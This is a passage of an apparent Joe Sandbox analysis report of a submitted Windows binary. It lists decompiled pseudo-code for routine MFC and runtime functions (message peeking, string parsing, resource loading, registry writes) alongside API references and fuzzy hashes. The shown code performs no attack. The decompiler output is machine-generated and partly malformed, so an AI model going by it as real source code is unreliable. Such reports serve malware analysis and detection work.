						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E0040D3B7();
						}
						L17:
						return E0041F7C2(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E0040D3B7();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

0x0041d8af
0x0041d8af
0x0041d8b6
0x0041d8c1
0x0041d8c7
0x0041d8d4
0x0041d8d7
0x0041d93c
0x0041d93c
0x0041d93f
0x0041d961
0x0041d967
0x0041d969
0x0041d973
0x0041d973
0x0041d976
0x0041d976
0x0041d97d
0x0041d97f
0x0041d982
0x0041d983
0x0041d983
0x0041d98b
0x0041d990
0x0041d990
0x0041d941
0x0041d941
0x0041d945
0x0041d948
0x0041d94a
0x0041d94d
0x0041d94e
0x0041d94e
0x0041d953
0x0041d955
0x00000000
0x0041d955
0x0041d8dc
0x00000000
0x00000000
0x0041d8e3
0x0041d8eb
0x00000000
0x0041d8f2
0x0041d8f8
0x0041d8ff
0x0041d912
0x0041d916
0x0041d929
0x0041d934
0x0041d937
0x00000000
0x0041d937

APIs

__EH_prolog3.LIBCMT ref: 0041D8B6
PeekMessageA.USER32 ref: 0041D910
PeekMessageA.USER32 ref: 0041D927
PeekMessageA.USER32 ref: 0041D961

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
Instruction ID: 1d58d31dcb184bdaff623e44cde678fc4dd054cac071c02b76d39c172b6b99e5
Opcode Fuzzy Hash: f2860d6ab98e288d2f9796487f0e940f05db750c7d82c61cd7a5e65f63dd04ff
Instruction Fuzzy Hash: 323171F1A10309ABDB209FA0DD85EAE77B8BF04714F00062EB552A62D1D778AA40CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00411917, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E00411917(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x443590; // 0xa920217c
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E004223D4(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E004223D4( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E00422304( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
					if(_t34 != 0) {
						 *_t34 = _t22;
					}
					if(_t22 == 0) {
						L3:
						_t23 = 0;
						goto L17;
					} else {
						_push(0xa);
						_push(0);
						_push( &_v264);
						if(_a12 == 0) {
							_t23 = E00422215();
						} else {
							_t23 = E004221EC();
						}
						L17:
						return E0041E5DF(_t23, _t26, _v8 ^ _t37, _t33, _t34, _t35);
					}
				}
				if(_t34 != 0) {
					 *_t34 =  *_t34 & _t14;
				}
				goto L3;
			}

0x00411917
0x00411917
0x00411920
0x00411927
0x0041192d
0x00411930
0x00411935
0x0041193b
0x0041193c
0x0041193f
0x00411944
0x00411957
0x00411958
0x0041195a
0x00411960
0x0041197b
0x00411970
0x00411976
0x00411976
0x00411980
0x00411984
0x0041198d
0x0041198d
0x00411993
0x0041199b
0x0041199c
0x0041199d
0x0041199f
0x0041199f
0x004119a3
0x0041194c
0x0041194c
0x00000000
0x004119a5
0x004119a9
0x004119b1
0x004119b3
0x004119b4
0x004119bd
0x004119b6
0x004119b6
0x004119b6
0x004119c5
0x004119d1
0x004119d1
0x004119a3
0x00411948
0x0041194a
0x0041194a
0x00000000

APIs

CharNextA.USER32(?), ref: 0041196E

Part of subcall function 004223D4: __ismbcspace_l.LIBCMT ref: 004223DA

CharNextA.USER32(00000000), ref: 0041198B
_strtol.LIBCMT ref: 004119B6
_strtoul.LIBCMT ref: 004119BD

Part of subcall function 00422215: strtoxl.LIBCMT ref: 00422235

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
String ID:
API String ID: 4211061542-0
Opcode ID: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
Instruction ID: 8c4b41d3fbd90daf78a1bc0d05ccb98cb6085a6a9126d8b84ccc100fad1095ed
Opcode Fuzzy Hash: 4ad50f18f156165f88fae09250aadf94f50b5e3bb5c3d4eed2909c40359a7845
Instruction Fuzzy Hash: 8E2135B1610154ABCB20DB758C51BEA77E89F59354F10006BEBA0D3151DBBC8EC0CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00416835, Relevance: 6.1, APIs: 4, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00416835(signed int _a4, signed int _a8, intOrPtr _a12) {
				void* _t15;
				signed int _t17;
				void* _t18;
				void* _t19;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t15;
				}
				_t23 = _a4;
				if((_t23 & 0x00002000) == 0) {
					_t17 = (_t23 & 0x0000ffff) - 8;
					if(_t17 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00001000) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t17;
					}
					_t18 = _t17 - 1;
					if(_t18 == 0) {
						L13:
						_t17 =  *_t31;
						if(_t17 == 0) {
							goto L17;
						}
						_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
						goto L16;
					}
					_t17 = _t18 - 3;
					if(_t17 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t19 = _t17 - 1;
					if(_t19 == 0) {
						goto L13;
					} else {
						_t17 = _t19 - 0x7b;
						if(_t17 == 0) {
							E004167D2( &_a8, _a12);
							_t17 = _a8;
							if(_t17 != 0) {
								 *((intOrPtr*)( *_t17 + 0x10))(_t17,  *_t31, 0);
								_t17 = _a8;
								if(_t17 != 0) {
									_t17 =  *((intOrPtr*)( *_t17 + 8))(_t17);
								}
							}
						}
						goto L17;
					}
				}
				_t17 =  *_t31;
				if(_t17 == 0) {
					goto L17;
				} else {
					__imp__#16(_t17);
					goto L16;
				}
			}

0x00416839
0x0041683e
0x004168e2
0x004168e2
0x00416845
0x0041684d
0x00416861
0x00416864
0x004168ba
0x004168c0
0x004168c0
0x004168c3
0x004168c8
0x004168d9
0x004168d9
0x00000000
0x004168df
0x00416866
0x00416867
0x004168aa
0x004168aa
0x004168ae
0x00000000
0x00000000
0x004168b3
0x00000000
0x004168b3
0x00416869
0x0041686c
0x004168a2
0x00000000
0x004168a2
0x0041686e
0x0041686f
0x00000000
0x00416871
0x00416871
0x00416874
0x0041687c
0x00416881
0x00416886
0x0041688f
0x00416892
0x00416897
0x0041689c
0x0041689c
0x00416897
0x00416886
0x00000000
0x00416874
0x0041686f
0x0041684f
0x00416853
0x00000000
0x00416855
0x00416856
0x00000000
0x00416856

APIs

SafeArrayDestroy.OLEAUT32 ref: 00416856
CoTaskMemFree.OLE32(?), ref: 004168D9

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ArrayDestroyFreeSafeTask
String ID:
API String ID: 3253174383-0
Opcode ID: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
Instruction ID: 9c91db5bcdb4501a342168245182f2762e241240caaa57732c86d6e759acce40
Opcode Fuzzy Hash: ff2767bcfbf802d030f9915bf8789e482aa2cc33bf1bb96904a9821697865cec
Instruction Fuzzy Hash: 7B119A305012059BDF246F65D848BE77764FF00391B16442AF855D6250C739DD8ADB58

Uniqueness

Uniqueness Score: -1.00%

Function 004153F4, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004153F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t44;
				signed int _t46;
				signed int _t55;
				void* _t60;
				intOrPtr* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x30);
				E0041F6EA(E00432EB7, __ebx, __edi, __esi);
				_t55 = 0;
				 *((intOrPtr*)(_t64 - 0x18)) = 0;
				 *((intOrPtr*)(_t64 - 0x1c)) = 0x436aa8;
				_t62 =  *((intOrPtr*)(_t64 + 8));
				_t56 = _t64 - 0x14;
				 *(_t64 - 4) = 0;
				E0040DBE0(_t64 - 0x14, _t65,  *((intOrPtr*)(_t62 - 0xb0)));
				 *(_t64 - 4) = 1;
				if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t64 + 0xc)));
					_t60 = E0040E8F5(0, _t56, __edi, _t62, __eflags);
					GetRgnBox( *(_t60 + 4), _t64 - 0x2c);
					IntersectRect(_t64 - 0x3c, _t64 - 0x2c, _t62 - 0x9c);
					_t44 = EqualRect(_t64 - 0x3c, _t64 - 0x2c);
					__eflags = _t44;
					_push( *((intOrPtr*)(_t64 + 0x10)));
					if(_t44 == 0) {
						L2:
						_t46 =  *((intOrPtr*)( *_t62 + 0x64))(_t62, _t55);
						 *(_t64 - 4) = _t55;
						_t63 = _t46;
						if( *(_t64 - 0x10) != _t55) {
							_push( *((intOrPtr*)(_t64 - 0x14)));
							_push(_t55);
							E0040D3B7();
						}
						_t55 = _t63;
						L5:
						 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t64 - 0x1c)) = 0x4361d8;
						E0040E956(_t64 - 0x1c);
						return E0041F7C2(_t55);
					}
					_push(_t60);
					E00413FBC( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
					__eflags =  *(_t64 - 0x10);
					 *(_t64 - 4) = 0;
					if( *(_t64 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_push(0);
						E0040D3B7();
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t64 + 0x10)));
				goto L2;
			}

0x004153f4
0x004153f4
0x004153fb
0x00415400
0x00415402
0x00415405
0x0041540c
0x00415415
0x00415418
0x0041541b
0x00415423
0x00415427
0x00415465
0x0041546d
0x00415476
0x0041548b
0x00415499
0x0041549f
0x004154a1
0x004154a4
0x0041542c
0x00415430
0x00415436
0x00415439
0x0041543b
0x0041543d
0x00415440
0x00415441
0x00415441
0x00415446
0x00415448
0x00415448
0x0041544f
0x00415456
0x00415462
0x00415462
0x004154af
0x004154b0
0x004154b5
0x004154b8
0x004154bb
0x004154bd
0x004154c0
0x004154c1
0x004154c1
0x00000000
0x004154bb
0x00415429
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 004153FB
GetRgnBox.GDI32(?,?), ref: 00415476
IntersectRect.USER32 ref: 0041548B
EqualRect.USER32 ref: 00415499

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Rect$EqualH_prolog3Intersect
String ID:
API String ID: 2161412305-0
Opcode ID: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
Instruction ID: 673062383659f9e1f0083c5338fa9c7e27454a49a707c8e2040369ae72bcd230
Opcode Fuzzy Hash: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
Instruction Fuzzy Hash: 42212772D00209EBCF11EFA5C9809EEBB78BF48314F00856AE515A3251D7789A45DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00403115, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E00403115(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E0041F6EA(E00431B6F, __ebx, __edi, __esi);
				_t35 = E00402EE1(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E004030C0(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E0041F7F4( &_a4, 0x43c3a8);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E00402FE8(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x00403115
0x00403115
0x00403115
0x00403115
0x00403115
0x0040311c
0x00403129
0x0040312b
0x0040312e
0x00403132
0x00403135
0x00403137
0x00403137
0x0040313c
0x0040313f
0x00403143
0x00403146
0x00403152
0x00403157
0x00403159
0x0040315b
0x0040315e
0x00403163
0x00403165
0x00403165
0x00403183
0x00403199
0x004031a4
0x004031ac
0x004031ac
0x00403185
0x00403188
0x0040318a
0x0040318a
0x004031af

APIs

__EH_prolog3.LIBCMT ref: 0040311C

Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB

__CxxThrowException@8.LIBCMT ref: 00403152
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,0043C3A8,00000004,0040105C,8007000E), ref: 0040317B

Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8

LocalFree.KERNEL32(?), ref: 004031A4

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
Instruction ID: a0072123bbb8e88f97f6a2e598c50d444f9710c5a47a49e3e247eeb1caa48808
Opcode Fuzzy Hash: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
Instruction Fuzzy Hash: DE11C671604249AFDF00DFA4CC81DAE3BA9EB08354F10453AF925DA2E1D675DA51C758

Uniqueness

Uniqueness Score: -1.00%

Function 004060A2, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004060A2(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E0040DB94(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x004060a5
0x004060a6
0x004060a9
0x004060ab
0x004060b2
0x004060b5
0x004060b8
0x004060bf
0x004060d6
0x004060d6
0x004060dd
0x004060e8
0x004060e8
0x004060ec
0x004060ef
0x004060f7
0x004060f9
0x00406108
0x0040610c
0x004060fb
0x004060fb
0x004060fe
0x00406102
0x00406102
0x00406115
0x00406121
0x00406121
0x00406115
0x00406127
0x0040612c
0x0040612c
0x00406138

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 004060C8
LoadResource.KERNEL32(?,00000000), ref: 004060D0
LockResource.KERNEL32(00000000), ref: 004060E2
FreeResource.KERNEL32(00000000), ref: 0040612C

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
Instruction ID: 40659096538afe78b8a2922fa92c0b5113ad7cc5d91cea190e6c9c4304d24e44
Opcode Fuzzy Hash: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
Instruction Fuzzy Hash: EE11BF30500712EBCB209FA5C848AABBBB4FF04355F11857AE84367691D378ED60D764

Uniqueness

Uniqueness Score: -1.00%

Function 004044BD, Relevance: 6.1, APIs: 4, Instructions: 56
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004044BD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				intOrPtr _t43;
				void* _t45;
				intOrPtr* _t51;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t46 = __ecx;
				_t44 = __ebx;
				_push(4);
				E0041F6EA(E00431C96, __ebx, __edi, __esi);
				_t51 = __ecx;
				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
				E00404F70(__ebx, __ecx, __edi, __ecx, _t53);
				_t54 =  *((intOrPtr*)(_t52 + 8));
				 *((intOrPtr*)(_t52 - 4)) = 0;
				 *_t51 = 0x435184;
				if( *((intOrPtr*)(_t52 + 8)) == 0) {
					 *((intOrPtr*)(_t51 + 0x50)) = 0;
				} else {
					_t43 = E0041FD45( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E0040DB94(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E004037E3(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E00404129(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E0041F7C2(_t51);
			}

0x004044bd
0x004044bd
0x004044bd
0x004044bd
0x004044c4
0x004044c9
0x004044cb
0x004044ce
0x004044d5
0x004044d8
0x004044db
0x004044e1
0x004044f1
0x004044e3
0x004044e6
0x004044eb
0x004044ec
0x004044ec
0x004044f9
0x004044fb
0x004044fd
0x004044ff
0x004044ff
0x004044ff
0x00404504
0x00404504
0x00404507
0x0040450e
0x00000000
0x00000000
0x00404510
0x00404519
0x00404522
0x00404525
0x00404528
0x0040452b
0x0040452e
0x00404531
0x00404534
0x00404537
0x0040453a
0x00404540
0x00404543
0x0040454a
0x00404551
0x00404554
0x0040455a
0x00404560
0x00404566
0x00404569
0x0040456c
0x00404572
0x00404578
0x0040457b
0x0040457e
0x0040458f

APIs

__EH_prolog3.LIBCMT ref: 004044C4

Part of subcall function 00404F70: __EH_prolog3.LIBCMT ref: 00404F77

__strdup.LIBCMT ref: 004044E6
GetCurrentThread.KERNEL32 ref: 00404513
GetCurrentThreadId.KERNEL32 ref: 0040451C

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
Instruction ID: 20f32028a5bae838525036816734f9698e3db64a09468b62decb6aeab759841c
Opcode Fuzzy Hash: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
Instruction Fuzzy Hash: 4521A4B0800B50CFC7219F2A854565AFBF4BFA4704F10892FD19A97B61DBB4A445DF08

Uniqueness

Uniqueness Score: -1.00%

Function 0040672A, Relevance: 6.1, APIs: 4, Instructions: 55
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040672A(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x443590; // 0xa920217c
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E0041FC83( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E004066E4(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E0041E5DF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x0040672a
0x00406730
0x00406737
0x0040673b
0x0040673f
0x00406746
0x00406749
0x00406789
0x0040679a
0x0040674b
0x00406751
0x00406755
0x00406763
0x0040676a
0x0040676c
0x00406776
0x00406776
0x00406755
0x004067ae

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00406763
RegCloseKey.ADVAPI32(00000000), ref: 0040676C
_swprintf.LIBCMT ref: 00406789
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040679A

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

